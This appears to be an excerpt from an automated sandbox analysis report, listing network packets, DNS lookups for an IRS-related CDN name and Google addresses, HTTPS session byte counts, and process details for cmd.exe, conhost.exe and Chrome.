Apr 25, 2024 15:12:18.615410089 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.615945101 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.615961075 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.844990969 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.845079899 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.860052109 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.860079050 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.860424042 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.861485004 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.908118963 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:19.063371897 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:19.063433886 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:19.063513994 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:19.064230919 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:19.064256907 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:19.064270973 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:19.064280033 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:27.958633900 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:27.958703995 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:27.958787918 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:28.953175068 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:28.953247070 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:29.321106911 CEST | 49703 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:29.360703945 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:29.360738039 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:29.360829115 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:29.362056017 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:29.362066984 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:29.478749037 CEST | 443 | 49703 | 23.1.237.91 | 192.168.2.5 |
Apr 25, 2024 15:12:29.798821926 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:29.798944950 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:29.802061081 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:29.802072048 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:29.802372932 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:29.880506992 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.268882036 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.316123962 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552180052 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552202940 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552210093 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552228928 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552254915 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552254915 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.552262068 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552294970 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552314997 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.552352905 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.552375078 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552459955 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.552465916 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552475929 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.552515984 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.570635080 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.570650101 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:12:30.570672035 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:12:30.570678949 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:16.812021971 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:16.812061071 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:16.812151909 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:16.812463045 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:16.812480927 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.246655941 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.246813059 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:17.254128933 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:17.254152060 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.254471064 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.258306026 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:17.300127983 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.668567896 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.668586016 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.668628931 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.668821096 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:17.668837070 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.668853998 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.669002056 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:17.675331116 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:17.675345898 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.675374031 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:17.675381899 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.681665897 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:17.681704044 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:17.681895971 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:17.682029009 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:17.682053089 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:17.937604904 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:17.937985897 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:17.938010931 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:17.939155102 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:17.939994097 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:17.940212965 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:17.993009090 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:27.930561066 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:27.930646896 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:27.930701971 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:29.745263100 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:29.745291948 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 25, 2024 15:12:13.521466970 CEST | 62382 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 25, 2024 15:12:13.521608114 CEST | 54001 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 25, 2024 15:12:13.628976107 CEST | 53 | 63993 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:12:13.641753912 CEST | 53 | 50992 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:12:14.306515932 CEST | 53 | 55828 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:12:16.724708080 CEST | 64289 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 25, 2024 15:12:16.725131035 CEST | 60640 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 25, 2024 15:12:17.623420954 CEST | 52383 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 25, 2024 15:12:17.623780012 CEST | 50069 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 25, 2024 15:12:17.734462023 CEST | 53 | 52383 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:12:17.734529972 CEST | 53 | 50069 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:12:31.313211918 CEST | 53 | 51181 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:12:56.654637098 CEST | 53 | 58864 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:13:13.440411091 CEST | 53 | 51722 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:13:13.444080114 CEST | 53 | 63906 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:13:43.933370113 CEST | 53 | 57357 | 1.1.1.1 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Apr 25, 2024 15:12:13.521466970 CEST | 192.168.2.5 | 1.1.1.1 | 0x325e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 25, 2024 15:12:13.521608114 CEST | 192.168.2.5 | 1.1.1.1 | 0xb8e | Standard query (0) | 65 | IN (0x0001) | false | |
Apr 25, 2024 15:12:16.724708080 CEST | 192.168.2.5 | 1.1.1.1 | 0x51a9 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 25, 2024 15:12:16.725131035 CEST | 192.168.2.5 | 1.1.1.1 | 0xd005 | Standard query (0) | 65 | IN (0x0001) | false | |
Apr 25, 2024 15:12:17.623420954 CEST | 192.168.2.5 | 1.1.1.1 | 0x4472 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 25, 2024 15:12:17.623780012 CEST | 192.168.2.5 | 1.1.1.1 | 0x4d11 | Standard query (0) | 65 | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Apr 25, 2024 15:12:13.633373976 CEST | 1.1.1.1 | 192.168.2.5 | 0xb8e | No error (0) | www.irs.gov.edgekey.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Apr 25, 2024 15:12:13.633708954 CEST | 1.1.1.1 | 192.168.2.5 | 0x325e | No error (0) | www.irs.gov.edgekey.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Apr 25, 2024 15:12:16.835016966 CEST | 1.1.1.1 | 192.168.2.5 | 0xd005 | No error (0) | www.irs.gov.edgekey.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Apr 25, 2024 15:12:16.836611986 CEST | 1.1.1.1 | 192.168.2.5 | 0x51a9 | No error (0) | www.irs.gov.edgekey.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Apr 25, 2024 15:12:17.734462023 CEST | 1.1.1.1 | 192.168.2.5 | 0x4472 | No error (0) | 142.250.9.104 | A (IP address) | IN (0x0001) | false | ||
Apr 25, 2024 15:12:17.734462023 CEST | 1.1.1.1 | 192.168.2.5 | 0x4472 | No error (0) | 142.250.9.147 | A (IP address) | IN (0x0001) | false | ||
Apr 25, 2024 15:12:17.734462023 CEST | 1.1.1.1 | 192.168.2.5 | 0x4472 | No error (0) | 142.250.9.99 | A (IP address) | IN (0x0001) | false | ||
Apr 25, 2024 15:12:17.734462023 CEST | 1.1.1.1 | 192.168.2.5 | 0x4472 | No error (0) | 142.250.9.103 | A (IP address) | IN (0x0001) | false | ||
Apr 25, 2024 15:12:17.734462023 CEST | 1.1.1.1 | 192.168.2.5 | 0x4472 | No error (0) | 142.250.9.105 | A (IP address) | IN (0x0001) | false | ||
Apr 25, 2024 15:12:17.734462023 CEST | 1.1.1.1 | 192.168.2.5 | 0x4472 | No error (0) | 142.250.9.106 | A (IP address) | IN (0x0001) | false | ||
Apr 25, 2024 15:12:17.734529972 CEST | 1.1.1.1 | 192.168.2.5 | 0x4d11 | No error (0) | 65 | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49718 | 184.31.62.93 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-04-25 13:12:18 UTC | 161 | OUT | |
2024-04-25 13:12:18 UTC | 467 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.5 | 49719 | 184.31.62.93 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-04-25 13:12:18 UTC | 239 | OUT | |
2024-04-25 13:12:19 UTC | 515 | IN | |
2024-04-25 13:12:19 UTC | 55 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.5 | 49720 | 52.165.165.26 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-04-25 13:12:30 UTC | 306 | OUT | |
2024-04-25 13:12:30 UTC | 560 | IN | |
2024-04-25 13:12:30 UTC | 15824 | IN | |
2024-04-25 13:12:30 UTC | 8666 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.5 | 49725 | 52.165.165.26 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-04-25 13:13:17 UTC | 306 | OUT | |
2024-04-25 13:13:17 UTC | 560 | IN | |
2024-04-25 13:13:17 UTC | 15824 | IN | |
2024-04-25 13:13:17 UTC | 9633 | IN |
Click to jump to process
Click to jump to process
Click to jump to process
Target ID: | 0 |
Start time: | 15:12:10 |
Start date: | 25/04/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff742d70000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 15:12:10 |
Start date: | 25/04/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d64d0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 15:12:10 |
Start date: | 25/04/2024 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff715980000 |
File size: | 3'242'272 bytes |
MD5 hash: | 45DE480806D1B5D462A7DDE4DCEFC4E4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 5 |
Start time: | 15:12:11 |
Start date: | 25/04/2024 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff715980000 |
File size: | 3'242'272 bytes |
MD5 hash: | 45DE480806D1B5D462A7DDE4DCEFC4E4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |